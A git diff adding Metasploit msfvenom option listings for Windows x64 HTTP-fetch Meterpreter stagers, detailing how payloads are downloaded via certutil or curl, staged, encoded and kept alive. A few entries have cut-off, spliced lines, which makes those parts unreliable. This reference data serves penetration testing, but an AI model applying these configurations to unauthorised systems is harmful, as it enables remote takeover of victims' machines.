FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..aecddef --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME yGuJAEPwGqD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt new file mode 100644 index 0000000..01b8cef --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + hdm + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME tWVPTdjIccC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..2180966 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZfZyuSDghd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt new file mode 100644 index 0000000..75f0656 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt @@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_http + Platform: Windows + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_http: +========================= + +hen_fewer@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME fXKqQJmatyB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt new file mode 100644 index 0000000..ed6477c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt @@ -0,0 +1,116 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_https + Platform: Windows + Arch: cmd +Needs Admin: No + Total siz +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_https: +========================= + +n_fewer@harmonysecurity.com> + OJ Reeves + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME nMGjUZTWJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt new file mode 100644 index 0000000..c0b1c2d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GkZvIxbSLgd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker via a named pipe 